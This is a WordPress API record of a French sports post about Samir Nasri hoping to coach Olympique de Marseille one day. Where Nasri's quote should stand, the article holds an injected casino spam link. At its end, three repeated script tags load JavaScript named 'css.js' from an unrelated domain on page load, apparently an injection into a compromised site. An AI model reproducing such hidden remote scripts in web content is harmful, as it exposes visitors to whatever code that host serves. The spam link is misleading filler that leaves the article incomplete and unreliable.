{"id":3897,"date":"2025-11-20T03:46:04","date_gmt":"2025-11-20T03:46:04","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3897"},"modified":"2026-02-02T22:12:32","modified_gmt":"2026-02-02T22:12:32","slug":"om-samir-nasri-se-voit-sur-le-banc-de-lom-un-jour","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/om-samir-nasri-se-voit-sur-le-banc-de-lom-un-jour\/","title":{"rendered":"OM : Samir Nasri se voit sur le banc de l\u2019OM un jour"},"content":{"rendered":"<h1>OM : Samir Nasri se voit sur le banc de l\u2019OM un jour<\/h1>\n<h2>Un r\u00eave assum\u00e9 par l\u2019ancien minot<\/h2>\n<p>\u00c0 l\u2019occasion de la promotion de son documentaire diffus\u00e9 sur <em>Canal+<\/em>, <strong>Samir Nasri<\/strong> a multipli\u00e9 les prises de parole m\u00e9diatiques. Invit\u00e9 sur les ondes de <em>RMC<\/em>, l\u2019ancien milieu offensif marseillais a \u00e9voqu\u00e9 son passage \u00e0 l\u2019OM et son attachement ind\u00e9fectible \u00e0 son club formateur. Plus encore, il a r\u00e9v\u00e9l\u00e9 nourrir une ambition claire : revenir un jour au V\u00e9lodrome, mais cette fois en tant qu\u2019entra\u00eeneur :<\/p>\n<blockquote><p><strong><a href=\"https:\/\/betify-casino-fr.com\/betify-casino-retraits\/\" target=\"_blank\" rel=\"dofollow\">betify casino Retraits<\/a><\/strong> &#8211; Le montant minimum pour un retrait sur Betify Casino est g\u00e9n\u00e9ralement de 20 \u20ac.<\/p><\/blockquote>\n<h2>La passion intacte pour l\u2019OM<\/h2>\n<p>Celui qui a port\u00e9 le maillot olympien de 2004 \u00e0 2008 n\u2019a pas cach\u00e9 son \u00e9motion lorsqu\u2019il parle de son v\u00e9cu \u00e0 Marseille. Jouer au V\u00e9lodrome reste pour lui un accomplissement, mais diriger l\u2019\u00e9quipe constituerait, selon ses mots, son <em>\u00ab r\u00eave absolu \u00bb<\/em>. Il sait cependant que ce r\u00f4le serait synonyme de pression extr\u00eame, tant l\u2019attente est immense autour du club phoc\u00e9en.<\/p>\n<h2>La sp\u00e9cificit\u00e9 marseillaise<\/h2>\n<p>Dans son intervention, <strong>Nasri<\/strong> a rappel\u00e9 que l\u2019OM est un club \u00e0 part, o\u00f9 l\u2019engouement peut vite se transformer en pression. Selon lui, les entra\u00eeneurs qui parviennent \u00e0 s\u2019imposer sont ceux capables d\u2019incarner l\u2019\u00e9nergie volcanique de la ville. Il cite notamment Marcelo Bielsa, Roberto De Zerbi ou encore Igor Tudor comme exemples de techniciens qui ont su s\u00e9duire les supporters gr\u00e2ce \u00e0 leur caract\u00e8re.<\/p>\n<h2>Un futur sur le banc encore lointain<\/h2>\n<p>Si ce souhait d\u2019entra\u00eener l\u2019OM fait r\u00eaver une partie des supporters, Nasri n\u2019en est pour l\u2019heure qu\u2019au stade de l\u2019intention. Aucune d\u00e9marche concr\u00e8te n\u2019a encore \u00e9t\u00e9 entreprise, mais sa d\u00e9claration rappelle combien l\u2019attachement au club reste vivace chez ceux qui y ont grandi. La perspective de voir un enfant de Marseille revenir un jour sur le banc reste une hypoth\u00e8se qui nourrit l\u2019imaginaire du public marseillais.<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OM : Samir Nasri se voit sur le banc de l\u2019OM un jour Un r\u00eave assum\u00e9 par l\u2019ancien minot \u00c0 l\u2019occasion de la promotion de son documentaire diffus\u00e9 sur Canal+,&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3897","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3897","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3897"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3897\/revisions"}],"predecessor-version":[{"id":14924,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3897\/revisions\/14924"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3897"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3897"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3897"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}